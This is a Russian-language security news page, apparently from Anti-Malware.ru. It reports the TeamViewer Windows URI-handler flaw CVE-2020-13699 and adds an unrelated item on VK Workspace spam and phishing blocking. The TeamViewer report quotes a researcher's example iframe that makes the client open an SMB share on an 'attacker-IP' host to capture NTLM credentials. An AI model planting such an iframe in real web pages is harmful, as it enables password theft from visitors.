Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

VK Workspace заблокировала 421 млн спам- и фишинговых писем за III квартал

В третьем квартале 2025 года корпоративная платформа VK Workspace предотвратила рассылку 421 миллиона спам- и фишинговых писем, направленных на компании. Благодаря этому удалось избежать кражи данных и заражения устройств вредоносными программами.

Как уточнили в компании, основную часть заблокированных сообщений составляли массовые рекламные рассылки, однако среди них было и множество фишинговых писем, имитирующих переписку с реальными организациями — в частности, логистическими компаниями, а также популярными брендами и госуслугами.

«Решения VK Workspace и Почты Mail остановили более 7,6 миллиарда спам-сообщений в третьем квартале 2025 года, направленных как на бизнес, так и на пользователей. Поэтому использование почты с продвинутой защитой от спама и фишинга становится особенно важным», — рассказал директор по информационной безопасности VK Tech Анатолий Тутынин.

По его словам, защита от фишинга и вредоносных писем в VK Workspace основана на машинном обучении и репутационных системах, которые анализируют домены отправителей. Кроме того, используется оптическое распознавание символов (OCR) — оно помогает выявлять спам, замаскированный под изображения.

В компании отмечают, что благодаря такому подходу система точнее определяет потенциальные угрозы и снижает риск того, что вредоносные письма дойдут до сотрудников.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru